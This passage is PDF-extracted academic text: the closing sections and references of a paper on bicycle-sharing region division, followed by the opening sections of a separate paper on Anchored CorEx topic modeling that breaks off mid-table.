PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 24/30 https://peerj.com https://doi.org/10.7717/peerjcs.224/fig-16 http://dx.doi.org/10.7717/peerj-cs.224 Figure 17 Difference in the number of bicycle rental points under three algorithms in the Chicago dataset. Full-size DOI: 10.7717/peerjcs.224/fig-17 Figure 18 Distance difference of bicycle scheduling area under three algorithms in the Chicago dataset. Full-size DOI: 10.7717/peerjcs.224/fig-18 CONCLUSION In order to solve the problem of regional division of public bicycles, this paper proposes CDoMO. The algorithm fully considers the special law of public bicycle lease/return, and in order to balance the scheduling workload between areas, the regional scheduling workload index is proposed. This problem is identified as a multi-objective optimization problem with two objective functions: minimize the variance between the estimated dispatch distances between each area; minimize the variance between the numbers of sites in each area. The regional scheduling workload can adjust the results of the community discovery algorithm in real time and dynamically. In the end, the results obtained can meet the special rules of public bicycle lease/return, and balance the workload between the areas. The experimental results show that the CDoMO can effectively shorten the scheduling Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 25/30 https://peerj.com https://doi.org/10.7717/peerjcs.224/fig-17 https://doi.org/10.7717/peerjcs.224/fig-18 http://dx.doi.org/10.7717/peerj-cs.224 Figure 19 Total distance of estimated scheduling under three algorithms in the Chicago dataset. Full-size DOI: 10.7717/peerjcs.224/fig-19 Figure 20 Comparison of experimental results of region partition under three algorithms in the Chicago dataset. Full-size DOI: 10.7717/peerjcs.224/fig-20 distance of public bicycle system, effectively improve the scheduling efficiency, and make the workload of each scheduling area relatively balanced. The next step is to have a more appropriate solution if you limit the travel time and mileage of the scheduling vehicle. ACKNOWLEDGEMENTS The authors are grateful to the anonymous referee for a careful checking of the details and for helpful comments that improved this paper. Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 26/30 https://peerj.com https://doi.org/10.7717/peerjcs.224/fig-19 https://doi.org/10.7717/peerjcs.224/fig-20 http://dx.doi.org/10.7717/peerj-cs.224 ADDITIONAL INFORMATION AND DECLARATIONS Funding Funding for this work was financially supported by the National Natural Science Foundation of China (No. 61602141) and the Key Research and Development Program of Zhejiang Province, China (Grant No.2019C03138). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: National Natural Science Foundation of China: 61602141. Key Research and Development Program of Zhejiang Province, China: 2019C03138. Competing Interests The authors declare there are no competing interests. Author Contributions • Fei Lin conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Yang Yang conceived and designed the experiments, performed the experiments, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Shihua Wang analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. • Yudi Xu performed the experiments, prepared figures and/or tables, performed the computation work, approved the final draft. • Hong Ma analyzed the data, prepared figures and/or tables, performed the computation work, approved the final draft, research funding. • Ritai Yu performed the experiments, prepared figures and/or tables, approved the final draft. Data Availability The following information was supplied regarding data availability: The data is available at GitHub: https://github.com/YannCuz/425.git. The New York public bicycle data are available in the Citi Bike Trip Histories repository: https://www.citibikenyc.com/system-data and http://datawrapper.dwcdn.net/rreHM/6/. The Chicago public bicycle data are available in the Divvy Data repository: https: //www.divvybikes.com/system-data. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.224#supplemental-information. Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 27/30 https://peerj.com https://github.com/YannCuz/425.git https://www.citibikenyc.com/system-data http://datawrapper.dwcdn.net/rreHM/6/ https://www.divvybikes.com/system-data https://www.divvybikes.com/system-data http://dx.doi.org/10.7717/peerj-cs.224#supplemental-information http://dx.doi.org/10.7717/peerj-cs.224#supplemental-information http://dx.doi.org/10.7717/peerj-cs.224 REFERENCES Basch CH, Ethan D, Zybert P, Afzaal S, Spillane M, Basch CE. 2015. Public bicycle sharing in New York City: helmet use behaviour patterns at 25 city bicycles stations. Journal of Community Health 40(3):530–533 DOI 10.1007/s10900-014-9967-y. Dubey PP, Borkar P. 2015. Review on techniques for traffic jam detection and conges- tion avoidance. In: 2015 2nd international conference on electronics and communica- tion Systems (ICECS)—review on techniques for traffic jam detection and congestion avoidance. Piscataway: IEEE, 434–440. Dziauddin MF, Powe N, Alvanides S. 2015. Estimating the effects of light rail transit (LRT) system on residential property values using geographically weighted regression (GWR). Applied Spatial Analysis and Policy 8(1):1–25 DOI 10.1007/s12061-014-9117-z. Feng X, Zhu FX, Liu SC. 2018. Label propagation community discovery algorithm based on DeepWalk model. Computer Engineering 44(3):220–225 232. Forma IA, Raviv T, Tzur M. 2015. A 3-step math heuristic for the static repositioning problem in bicycle-sharing systems. Transportation Research Part B 71(1):230–247 DOI 10.1016/j.trb.2014.10.003. Guo C, Gong C, Xu H, Yao Z. 2017. Queuing game theory based optimal routing scheme for heterogeneous users over space information networks. Mathematical Problems in Engineering 2017: Article 8064989 DOI 10.1155/2017/8064989. Hartmann Tolić I, Martinović G, Crnjac Milić D. 2018. Optimization methods in modern transportation systems. Tehnicki vjesnik—Technical Gazette 25(2):100–106. Hu X, An S, Wang J. 2018. Taxi driver’s operation behavior and passengers’ demand analysis based on GPS data. Journal of Advanced Transportation 2018:6197549 DOI 10.1155/2018/6197549. Jiang S, Guan W, He Z, Yang L. 2018. Exploring the intermodal relationship between taxi and subway in Beijing, China. Journal of Advanced Transportation 2018:3981845 DOI 10.1155/2018/3981845. Kim S, Jeong UB, Lee KY. 2017. Multi-objective optimization for mixed-flow pump with blade angle of impeller exit and diffuser inlet. Journal of Mechanical Science and Technology 31(11):5099–5106 DOI 10.1007/s12206-017-1003-6. Lin W, Song Y. 2017. A comparative study on X-ray diffraction mineral quan- titative analysis of two methods in sediments. Journal of Earth Environment 11(2):3400–3405. Long J, Szeto WY, Huang HJ. 2014. A bi-objective turning restriction design problem in urban road networks. European Journal of Operational Research 237(2):426–439 DOI 10.1016/j.ejor.2014.01.053. Manju VN, Fred AL. 2018. Ac coefficient and k-means cuckoo optimisation algorithm- based segmentation and compression of compound images. Iet Image Processing 12(2):218–225 DOI 10.1049/iet-ipr.2017.0430. Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 28/30 https://peerj.com http://dx.doi.org/10.1007/s10900-014-9967-y http://dx.doi.org/10.1007/s12061-014-9117-z http://dx.doi.org/10.1016/j.trb.2014.10.003 http://dx.doi.org/10.1155/2017/8064989 http://dx.doi.org/10.1155/2018/6197549 http://dx.doi.org/10.1155/2018/3981845 http://dx.doi.org/10.1007/s12206-017-1003-6 http://dx.doi.org/10.1016/j.ejor.2014.01.053 http://dx.doi.org/10.1049/iet-ipr.2017.0430 http://dx.doi.org/10.7717/peerj-cs.224 Miranda-Bront JJ, Curcio B, Méndez-Díaz I, Montero A, Pousa F, Zabala P. 2017. A cluster-first route-second approach for the swap body vehicle routing problem. Annals of Operations Research 253(2):935–956 DOI 10.1007/s10479-016-2233-1. Mori T, Saito S. 2016. Molecular mechanism behind the fast folding/unfolding transi- tions of villain headpiece subdomain: hierarchy and heterogeneity. Journal of Physical Chemistry B 712:2530–2147. Pan GQ, Jun-Yi HU, Min H. 2015. Gis-based logistics distribution area division and its vrp algorithm. Journal of Dalian Maritime University 41(1):83–90. Phanikrishnakishore M, Madamsetti AK. 2014. Attribute level clustering approach to quantitative association rule mining. International Journal of Computer Applications 95(6):17–23. Schuijbroek J, Hampshire RC, Hoeve WJV. 2016. Inventory rebalancing and vehicle routing in bicycle sharing systems. European Journal of Operational Research 257(3):992–1004. Shivach P, Nautiyal L, Ram M. 2018. Applying multi-objective optimization al- gorithms to mechanical engineering. In: Ram M, Davim J, eds. Soft computing techniques and applications in mechanical engineering. Hershey: IGI Global, 287–301 DOI 10.4018/978-1-5225-3035-0.ch014. Shpak M, Ni Y, Lu J, Müller P. 2017. Variance in estimated pairwise genetic distance un- der high versus low coverage sequencing: the contribution of linkage disequilibrium. Theoretical Population Biology 71:230–247. Sun W, Zhang L, Du B. 2015. Band selection using improved sparse subspace clustering for hyperspectral imagery classification. IEEE Journal of Selected Topics in Applied Earth Observations and Remote Sensing 8(6):1–14 DOI 10.1109/JSTARS.2015.2396412. Sun Z-Y, Li Y, Qu W-C, Muhammad T. 2018. Unified framework for optimal routing choice under guidance information. Complexity 2018:9764204 DOI 10.1155/2018/9764204. Tulabandhula T, Bodas T. 2018. Method and system for dispatching of vehicles in a public transportation network. United States Patent 23(15):1017–1027. Wu T. 2014. Research of logistics distribution path planning based on improved nsga-ii. Journal of Information & Computational Science 11(7):2143–2153 DOI 10.12733/jics20103386. Xu JM, Qin XR, Ma YY. 2017. Public bicycle multilevel partition scheduling method. Jiaotong Yunshu Xitong Gongcheng Yu Xinxi/ Journal of Transportation Systems Engineering and Information Technology 17(1):212–219. Yanping J, Decai K, Duoning Y. 2017. Two-sided stable matching decision-making method with ordinal interval preference. Systems Engineering—Theory & Practice 37(8):2152–2161. Ye P, Chu C, Xu L. 2015. IC card-based data mining characteristics of urban public bicycles. In: Fifth international conference on transportation engineering. 2124–2132 DOI 10.1061/9780784479384.271. Zhang J, Liang Y, Wei WJ. 2017. Regional division of public bicycle stations based on improved k-means algorithm. Information Communication 1(4):42–44. Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 29/30 https://peerj.com http://dx.doi.org/10.1007/s10479-016-2233-1 http://dx.doi.org/10.4018/978-1-5225-3035-0.ch014 http://dx.doi.org/10.1109/JSTARS.2015.2396412 http://dx.doi.org/10.1155/2018/9764204 http://dx.doi.org/10.12733/jics20103386 http://dx.doi.org/10.1061/9780784479384.271 http://dx.doi.org/10.7717/peerj-cs.224 Zhang W, Ge Y, Yuan B, Xu H. 2011. Busy line analysis with improved association rules mining algorithm for hangzhou public free-bicycle system. In: Intelligent systems. Vol. 1. Piscataway: IEEE, 139–142. Zhen Z, Xiangqian LI, Dept S, Univ SN. 2016. Development and enlightenment of public bicycle sport in Chicago. Journal of Sports Adult Education 11(1):200–205. Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 30/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.224 work_wqab4ttubbdubhqub6dpdmptmq ---- Anchored Correlation Explanation: Topic Modeling with Minimal Domain Knowledge Ryan J. Gallagher1,2, Kyle Reing1, David Kale1, and Greg Ver Steeg1 1Information Sciences Institute, University of Southern California 2Vermont Complex Systems Center, Computational Story Lab, University of Vermont ryan.gallagher@uvm.edu {reing,kale,gregv}@isi.edu Abstract While generative models such as Latent Dirichlet Allocation (LDA) have proven fruit- ful in topic modeling, they often require de- tailed assumptions and careful specification of hyperparameters. Such model complexity is- sues only compound when trying to general- ize generative models to incorporate human input. We introduce Correlation Explanation (CorEx), an alternative approach to topic mod- eling that does not assume an underlying gen- erative model, and instead learns maximally informative topics through an information- theoretic framework. This framework nat- urally generalizes to hierarchical and semi- supervised extensions with no additional mod- eling assumptions. In particular, word-level domain knowledge can be flexibly incorpo- rated within CorEx through anchor words, al- lowing topic separability and representation to be promoted with minimal human interven- tion. Across a variety of datasets, metrics, and experiments, we demonstrate that CorEx produces topics that are comparable in quality to those produced by unsupervised and semi- supervised variants of LDA. 1 Introduction The majority of topic modeling approaches utilize probabilistic generative models, models which spec- ify mechanisms for how documents are written in order to infer latent topics. These mechanisms may be explicitly stated, as in Latent Dirichlet Alloca- tion (LDA) (Blei et al., 2003), or implicitly stated, as with matrix factorization techniques (Hofmann, 1999; Ding et al., 2008; Buntine and Jakulin, 2006). The core generative mechanisms of LDA, in par- ticular, have inspired numerous generalizations that account for additional information, such as the au- thorship (Rosen-Zvi et al., 2004), document labels (McAuliffe and Blei, 2008), or hierarchical structure (Griffiths et al., 2004). However, these generalizations come at the cost of increasingly elaborate and unwieldy generative assumptions. While these assumptions allow topic inference to be tractable in the face of additional metadata, they progressively constrain topics to a narrower view of what a topic can be. Such assump- tions are undesirable in contexts where one wishes to minimize model complexity and learn topics with- out preexisting notions of how those topics origi- nated. For these reasons, we propose topic modeling by way of Correlation Explanation (CorEx),1 an information-theoretic approach to learning latent topics over documents. Unlike LDA, CorEx does not assume a particular data generating model, and instead searches for topics that are “maximally in- formative” about a set of documents. By learning informative topics rather than generated topics, we avoid specifying the structure and nature of topics ahead of time. In addition, the lightweight framework underly- ing CorEx is versatile and naturally extends to hier- archical and semi-supervised variants with no addi- tional modeling assumptions. More specifically, we 1Open source, documented code for the CorEx topic model available at https://github.com/gregversteeg/ corex_topic. 529 Transactions of the Association for Computational Linguistics, vol. 5, pp. 529–542, 2017. Action Editor: Diana McCarthy. Submission batch: 7/2017 Published 12/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. may flexibly incorporate word-level domain knowl- edge within the CorEx topic model. Topic models are often susceptible to portraying only dominant themes of documents. Injecting a topic model, such as CorEx, with domain knowledge can help guide it towards otherwise underrepresented topics that are of importance to the user. By incorporating rele- vant domain words, we might encourage our topic model to recognize a rare disease that would other- wise be missed in clinical health notes, focus more attention to topics from news articles that can guide relief workers in distributing aid more effectively, or disambiguate aspects of a complex social issue. Our contributions are as follows: first, we frame CorEx as a topic model and derive an efficient alter- ation to the CorEx algorithm to exploit sparse data, such as word counts in documents, for dramatic speedups. Second, we show how domain knowledge can be naturally integrated into CorEx through “an- chor words” and the information bottleneck. Third, we demonstrate that CorEx and anchored CorEx produce topics of comparable quality to unsuper- vised and semi-supervised variants of LDA over sev- eral datasets and metrics. Finally, we carefully detail several anchoring strategies that highlight the versa- tility of anchored CorEx on a variety of tasks. 2 Methods 2.1 CorEx: Correlation Explanation Here we review the fundamentals of Correlation Ex- planation (CorEx), and adopt the notation used by Ver Steeg and Galstyan in their original presenta- tion of the model (2014). Let X be a discrete ran- dom variable that takes on a finite number of val- ues, indicated with lowercase, x. Furthermore, if we have n such random variables, let XG denote a sub-collection of them, where G ⊆ {1, . . . ,n}. The probability of observing XG = xG is written as p(XG = xG), which is typically abbreviated to p(xG). The entropy of X is written as H(X) and the mutual information of two random variables X1 and X2 is given by I(X1 : X2) = H(X1) + H(X2) − H(X1,X2). The total correlation, or multivariate mutual in- formation, of a group of random variables XG is ex- pressed as TC(XG) = ∑ i∈G H(Xi) −H(XG) (1) = DKL ( p(xG)|| ∏ i∈G p(xi) ) . (2) We see that Eq. 1 does not quantify “correlation” in the modern sense of the word, and so it can be help- ful to conceptualize total correlation as a measure of total dependence. Indeed, Eq. 2 shows that total cor- relation can be expressed using the Kullback-Leibler Divergence and, therefore, it is zero if and only if the joint distribution of XG factorizes, or, in other words, there is no dependence between the random variables. The total correlation can be written when condi- tioning on another random variable Y , TC(XG | Y ) = ∑ i∈G H(Xi | Y ) −H(XG | Y ). So, we can consider the reduction in the total correlation when conditioning on Y . TC(XG; Y ) = TC(XG) −TC(XG | Y ) (3) = ∑ i∈G I(Xi : Y ) − I(XG : Y ) (4) The quantity expressed in Eq. 3 acts as a lower bound of TC(XG) (Ver Steeg and Galstyan, 2015), as readily verified by noting that TC(XG) and TC(XG|Y ) are always non-negative. Also note, the joint distribution of XG factorizes conditional on Y if and only if TC(XG | Y ) = 0. If this is the case, then TC(XG; Y ) is maximized, and Y explains all of the dependencies in XG. In the context of topic modeling, XG represents a group of word types and Y represents a topic to be learned. Since we are always interested in group- ing multiple sets of words into multiple topics, we will denote the binary latent topics as Y1, . . .Ym and their corresponding groups of word types as XGj for j = 1, . . . ,m respectively. The CorEx topic model seeks to maximally explain the dependencies of words in documents through latent topics by max- imizing TC(X; Y1, . . . ,Ym). To do this, we maxi- mize the following lower bound on this expression: max Gj,p(yj|xGj ) m∑ j=1 TC(XGj ; Yj). (5) 530 As we describe in the following section, this ob- jective can be efficiently approximated, despite the search occurring over an exponentially large proba- bility space (Ver Steeg and Galstyan, 2014). Since each topic explains a certain portion of the overall total correlation, we may choose the number of topics by observing diminishing returns to the ob- jective. Furthermore, since the CorEx implementa- tion depends on a random initialization (as described shortly), one may restart the CorEx topic model sev- eral times and choose the one that explains the most total correlation. The latent factors, Yj, are optimized to be infor- mative about dependencies in the data and do not require generative modeling assumptions. Note that the discovered factors, Y , can be used as inputs to construct new latent factors, Z, and so on leading to a hierarchy of topics. Although this extension is quite natural, we focus our analysis on the first level of topic representations for easier interpretation and evaluation. 2.2 CorEx Implementation We summarize the implementation of CorEx as pre- sented by Ver Steeg and Galstyan (2014) in prepa- ration for innovations introduced in the subsequent sections. The numerical optimization for CorEx be- gins with a random initialization of parameters and then proceeds via an iterative update scheme simi- lar to EM. For computational tractability, we subject the optimization in Eq. 5 to the constraint that the groups, Gj, do not overlap, i.e. we enforce single- membership of words within topics. The optimiza- tion entails a combinatorial search over groups, so instead we look for a form that is more amenable to smooth optimization. We rewrite the objective using the alternate form in Eq. 4 while introducing indica- tor variables αi,j which are equal to 1 if and only if word Xi appears in topic Yj (i.e. i ∈ Gj). max αi,j,p(yj|x) m∑ j=1 ( n∑ i=1 αi,jI(Xi : Yj) − I(X : Yj) ) s.t. αi,j = I[j = arg max j̄ I(Xi : Yj̄)]. (6) Note that the constraint on non-overlapping groups now becomes a constraint on α. To make the opti- mization smooth we should relax the constraint so that αi,j ∈ [0, 1]. To do so, we replace the second line with a softmax function. The update for α at iteration t becomes, αti,j = exp ( λt(I(Xi : Yj) − max j̄ I(Xi : Yj̄)) ) . Now α ∈ [0, 1] and the parameter λ controls the sharpness of the softmax function. Early in the opti- mization we use a small value of λ, then increase it later in the optimization to enforce a hard constraint. The objective in Eq. 6 only lower bounds total cor- relation in the hard max limit. The constraint on α forces competition among latent factors to explain certain words, while setting λ = 0 results in all fac- tors learning the same thing. Holding α fixed, taking the derivative of the objective (with respect to the variables p(yj|x), and setting it equal to zero leads to a fixed point equation. We use this fixed point to define update equations at iteration t. pt(yj) = ∑ x̄ pt(yj|x̄)p(x̄) (7) pt(xi|yj) = ∑ x̄ pt(yj|x̄)p(x̄)I[x̄i = xi]/pt(yj) log pt+1(yj|x`) = (8) log pt(yj)+ n∑ i=1 αti,j log pt(x ` i | yj) p(x`i) − logZj(x`) The first two lines just define the marginals in terms of the optimization parameter, pt(yj|x). We take p(x) to be the empirical distribution defined by some observed samples, x`,` = 1, . . . ,N. The third line updates pt(yj|x`), the probabilistic labels for each latent factor, Yj, for a given sample, x`. Note that an easily calculated constant, Zj(x`), appears to ensure the normalization of pt(yj|x`) for each sample. We iterate through these updates until convergence. After convergence, we use the mutual information terms I(Xi : Yj) to rank which words are most in- formative for each factor. The objective is a sum of terms for each latent factor and this allows us to rank the contribution of each factor toward our lower bound on the total correlation. The expected log of the normalization constant, often called the free en- ergy, E[logZj(x)], plays an important role since its expectation provides a free estimate of the i-th term in the objective (Ver Steeg and Galstyan, 2015), as 531 can be seen by taking the expectation of Eq. 8 at convergence and comparing it to Eq. 6. Because our sample estimate of the objective is just the mean of contributions from individual sample points, x`, we refer to logZj(x`) as the pointwise total correlation explained by factor j for sample `. Pointwise TC can be used to localize which samples are particu- larly informative about specific latent factors. 2.3 Sparsity Optimization 2.3.1 Derivation To alter the CorEx optimization procedure to ex- ploit sparsity in the data, we now assume that all variables, xi,yj, are binary and x is a binary vector where X`i = 1 if word i occurs in document ` and X`i = 0 otherwise. Since all variables are binary, the marginal distribution, p(xi|yj), is just a two by two table of probabilities and can be estimated effi- ciently. The time-consuming part of training is the subsequent update of the document labels in Eq. 8 for each document `. The computation of the log likelihood ratio for all n words over all documents is not efficient, as most words do not appear in a given document. We rewrite the logarithm in the interior of the sum. log pt(x ` i | yj) p(x`i) = log pt(Xi = 0 | yj) p(Xi = 0) + (9) xli log ( pt(X ` i = 1 | yj)p(Xi = 0) pt(Xi = 0 | yj)p(X`i = 1) ) Note, when the word does not appear in the docu- ment, only the leading term of Eq. 9 will be nonzero. However, when the word does appear, everything but log P(X`i = 1 | yj)/p(X`i = 1) cancels out. So, we have taken advantage of the fact that the CorEx topic model binarizes documents to assume by de- fault that a word does not appear in the document, and then correct the contribution to the update if the word does appear. Thus, when substituting back into Eq. 8, the sum becomes a matrix multiplication between a matrix with dimensions of the number of variables by the number of documents and entries x`i that is as- sumed to be sparse and a dense matrix with di- mensions of the number of variables by the num- ber of latent factors. Given n variables, N sam- ples, and ρ nonzero entries in the data matrix, the 100 101 102 103 104 D is a st e r R e li e f A rt ic le s T im e ( S e c o n d s) CorEx Sparse CorEx LDA 100 101 102 103 104 N e w Y o rk T im e s T im e ( S e c o n d s) 103 104 105 106 Number of Docs (500 Words Fixed) 100 101 102 103 104 P u b M e d T im e ( S e c o n d s) 103 104 105 Number of Words (5000 Documents Fixed) Figure 1: Speed comparisons to a fixed number of itera- tions as the number of documents and words vary. New York Times articles and PubMed abstracts were collected from the UCI Machine Learning Repository (Lichman, 2013). The disaster relief articles are described in section 4.1, and represented simply as bags of words, not phrases. asymptotic scaling for CorEx goes from O(Nn) to O(n)+O(N)+O(ρ) exploiting sparsity. Latent tree modeling approaches are quadratic in n or worse, so we expect CorEx’s computational advantage to in- crease for larger datasets. 2.3.2 Optimization Evaluation We perform experiments comparing the running time of CorEx before and after implementing the im- provements which exploit sparsity. We also compare with Scikit-Learn’s simple batch implementation of LDA using the variational Bayes algorithm (Hoff- man et al., 2013). Experiments were performed on a four core, Intel i5 chip running at 4 GHz with 32 GB RAM. We show run time when varying the data size in terms of the number of word types and the num- ber of documents. We used 50 topics for all runs and set the number of iterations for each run to 10 itera- tions for LDA and 50 iterations for CorEx. Results are shown in Figure 1. We see that CorEx exploit- ing sparsity is orders of magnitude faster than the 532 naive version and is generally comparable to LDA as the number of documents scales. The slope on the log-log plot suggests a linear dependence of run- ning time on the dataset size, as expected. 2.4 Anchor Words via the Bottleneck The information bottleneck formulates a trade-off between compressing data X into a representation Y , and preserving the information in X that is rel- evant to Z (typically labels in a supervised learning task) (Tishby et al., 1999; Friedman et al., 2001). More formally, the information bottleneck is ex- pressed as max p(y|x) βI(Z : Y ) − I(X : Y ), (10) where β is a parameter controlling the trade-off be- tween compressing X and preserving information about the relevance variable, Z. To see the connection with CorEx, we compare the CorEx objective as written in Eq. 6 with the bottleneck in Eq. 10. We see that we have exactly the same compression term for each latent factor, I(X : Yj), but the relevance variables now corre- spond to Z ≡ Xi. If we want to learn represen- tations that are more relevant to specific keywords, we can simply anchor a word type Xi to topic Yj, by constraining our optimization so that αi,j = βi,j, where βi,j ≥ 1 controls the anchor strength. Oth- erwise, the updates on α remain the same. This schema is a natural extension of the CorEx optimiza- tion and it is flexible, allowing for multiple word types to be anchored to one topic, for one word type to be anchored to multiple topics, or for any com- bination of these semi-supervised anchoring strate- gies. 3 Related Work With respect to integrating domain knowledge into topic models, we draw inspiration from Arora et al. (2012), who used anchor words in the con- text of non-negative matrix factorization. Using an assumption of separability, these anchor words act as high precision markers of particular topics and, thus, help discern the topics from one another. Al- though the original algorithm proposed by Arora et al. (2012), and subsequent improvements to their approach, find these anchor words automatically (Arora et al., 2013; Lee and Mimno, 2014), recent adaptations allow manual insertion of anchor words and other metadata (Nguyen et al., 2014; Nguyen et al., 2015). Our work is similar to the latter, where we treat anchor words as fuzzy logic markers and em- bed them into the topic model in a semi-supervised fashion. In this sense, our work is closest to Halpern et al. (2014; 2015), who have also made use of do- main expertise and semi-supervised anchored words in devising topic models. There is an adjacent line of work that has focused on incorporating word-level information into LDA- based models. Jagarlamudi et al. (2012) proposed SeededLDA, a model that seeds words into given topics and guides, but does not force, these topics towards these integrated words. Andrzejewski and Zhu (2009) presented a model that makes use of “z- labels,” words that are known to pertain to specific topics and that are restricted to appearing in some subset of all the possible topics. Although the z- labels can be leveraged to place different senses of a word into different topics, it requires additional ef- fort to determine when these different senses occur. Our anchoring approach allows a user to more easily anchor one word to multiple topics, allowing CorEx to naturally find topics that revolve around different senses of a word. Andrzejewski et al. (2009) presented a second model which allows specification of Must-Link and Cannot-Link relationships between words that help partition otherwise muddled topics. These logical constraints help enforce topic separability, though these mechanisms less directly address how to an- chor a single word or set of words to help a topic emerge. More generally, the Must/Cannot link and z-label topic models have been expressed in a powerful first-order-logic framework that allows the specification of arbitrary domain knowledge through logical rules (Andrzejewski et al., 2011). Others have built off this first-order-logic approach to au- tomatically learn rule weights (Mei et al., 2014) and incorporate additional latent variable informa- tion (Foulds et al., 2015). Mathematically, CorEx topic models most closely resemble topic models based on latent tree recon- struction (Chen et al., 2016). In Chen et al.’s (2016) analysis, their own latent tree approach and CorEx both report significantly better perplexity than hi- 533 erarchical topic models based on the hierarchical Dirichlet process and the Chinese restaurant process. CorEx has also been investigated as a way to find “surprising” documents (Hodas et al., 2015). 4 Data and Evaluation Methods 4.1 Data We use two challenging datasets with corresponding domain knowledge lexicons to evaluate anchored CorEx. Our first dataset consists of 504,000 human- itarian assistance and disaster relief (HA/DR) arti- cles covering 21 disaster types collected from Re- liefWeb, an HA/DR news article aggregator spon- sored by the United Nations. To mitigate over- whelming label imbalances during anchoring, we both restrict ourselves to documents in English with one label, and randomly subsample 2,000 articles from each of the largest disaster type labels. This leaves us with a corpus of 18,943 articles.2 We accompany these articles with an HA/DR lex- icon of approximately 34,000 words and phrases. The lexicon was curated by first gathering 40–60 seed terms per disaster type from HA/DR domain experts and CrisisLex. This term list was then ex- panded by creating word embeddings for each dis- aster type, and taking terms within a specified co- sine similarity of the seed words. These lists were then filtered by removing names, places, non-ASCII characters, and terms with fewer than three charac- ters. Finally, the extracted terms were audited using CrowdFlower, where users rated the relevance of the terms on a Likert scale. Low relevance terms were dropped from the lexicon. Of these terms 11,891 types appear in the HA/DR articles. Our second dataset consists of 1,237 deidentified clinical discharge summaries from the Informatics for Integrating Biology and the Bedside (i2b2) 2008 Obesity Challenge.3 These summaries are labeled by clinical experts with 15 conditions frequently associated with obesity. For these documents, we leverage a text pipeline that extracts common med- ical terms and phrases (Dai et al., 2008; Chapman et al., 2001), which yields 3,231 such term types. 2HA/DR articles and accompanying lexicon available at http://dx.doi.org/10.7910/DVN/TGOPRU 3Data available upon data use agreement at https:// www.i2b2.org/NLP/Obesity/ For both sets of documents, we use their respective lexicons to break the documents down into bags of words and phrases. We also make use of the 20 Newsgroups dataset, as provided and preprocessed in the Scikit-Learn li- brary (Pedregosa et al., 2011). 4.2 Evaluation CorEx does not explicitly attempt to learn a genera- tive model and, thus, traditional measures such as perplexity are not appropriate for model compari- son against LDA. Furthermore, it is well-known that perplexity and held-out log-likelihood do not neces- sarily correlate with human evaluation of semantic topic quality (Chang et al., 2009). Therefore, we measure the semantic topic quality using Mimno et al.’s (2011) UMass automatic topic coherence score, which correlates with human judgments. We also evaluate the models in terms of multi- class logistic regression document classification (Pe- dregosa et al., 2011), where the feature set of each document is its topic distribution. We perform all document classification tasks using a 60/40 training- test split. Finally, we measure how well each topic model does at clustering documents. We obtain a cluster- ing by assigning each document to the topic that oc- curs with the highest probability. We then measure the quality within clusters (homogeneity) and across clusters (adjusted mutual information). The highest possible value for both measures is one. We do not report clustering metrics on the clinical health notes because the documents are multi-label and, in that case, the metrics are not well-defined. 4.3 Choosing Anchor Words We wish to systematically test the effect of anchor words given the domain-specific lexicons. To do so, we follow the approach used by Jagarlamudi et al. (2012) to automatically generate anchor words: for each label in a data set, we find the words that have the highest mutual information with the label. For word w and label L, this is computed as I(L : w) = H(L) −H(L | w), (11) where for each document of label L we consider if the word w appears or not. 534 0.2 0.3 0.4 0.5 M a c ro F 1 Disaster Relief Articles 20 Newsgroups Clinical Health Notes 0.2 0.3 0.4 0.5 0.6 M ic ro F 1 160 140 120 100 80 60 C o h e re n c e 20 40 60 80 100 Number of Topics 20 40 60 80 100 Number of Topics 0.1 0.2 0.3 0.4 H o m o g e n e it y 20 40 60 80 100 Number of Topics CorEx LDA Figure 2: Baseline comparison of CorEx to LDA with respect to topic coherence and document classification and clustering on three different datasets as the number of topics vary. Points are the average of 30 runs of a topic model. Confidence intervals are plotted but are so small that they are not distinguishable. CorEx is trained using binary data, while LDA is trained on count data. Ho- mogeneity is not well-defined on the multi-label clinical health notes, so it is omitted. 5 Results 5.1 LDA Baseline Comparison We compare CorEx to LDA in terms of topic coher- ence, document classification, and document clus- tering across three datasets. CorEx is trained on bi- nary data, while LDA is trained on count data. While not reported here, CorEx consistently outperformed LDA trained on binary data. In doing these compar- isons, we use the Gensim implementation of LDA (Řehůřek and Sojka, 2010). The results of compar- ing CorEx to LDA as a function of the number of topics are presented in Figure 2. Across all three datasets, we find that the topics produced by CorEx yield document classification re- sults that are on par with or better than those pro- duced by LDA topics. In terms of clustering, CorEx consistently produces document clusters of higher Rank Disaster Relief Topic 1 drought, farmers, harvest, crop, livestock, planting, grain, maize, rainfall, irrigation 3 eruption, volcanic, lava, crater, eruptions, volcanos, slopes, volcanic activity, evacuated, lava flows 8 winter, snow, snowfall, temperatures, heavy snow, heating, freezing, warm clothing, severe winter, avalanches 23 military, armed, civilians, soldiers, aircraft, weapons, rebel, planes, bombs, military personnel Rank 20 Newsgroups Topic 3 team, game, season, player, league, hockey, play, teams, nhl 14 car, bike, cars, engine, miles, road, ride, riding, bikes, ground 26 nasa, launch, orbit, shuttle, mission, satellite, gov, jpl, orbital, solar 39 medical, disease, doctor, patients, treatment, medicine, health, hospital, doctors, pain Rank Clinical Health Notes Topic 12 vomiting, nausea, abdominal pain, diarrhea, fever, dehydration, chill, clostridium difficile, intravenous fluid, compazine 19 anxiety state, insomnia, ativan, neurontin, depression, lorazepam, gabapentin, trazodone, fluoxetine, headache 27 pain, oxycodone, tylenol, percocet, ibuprofen, morphine, osteoarthritis, hernia, motrin, bleeding Table 1: Examples of topics learned by the CorEx topic model. Words are ranked according to mutual informa- tion with the topic, and topics are ranked according to the amount of total correlation they explain. Topic models were run with 50 topics on the 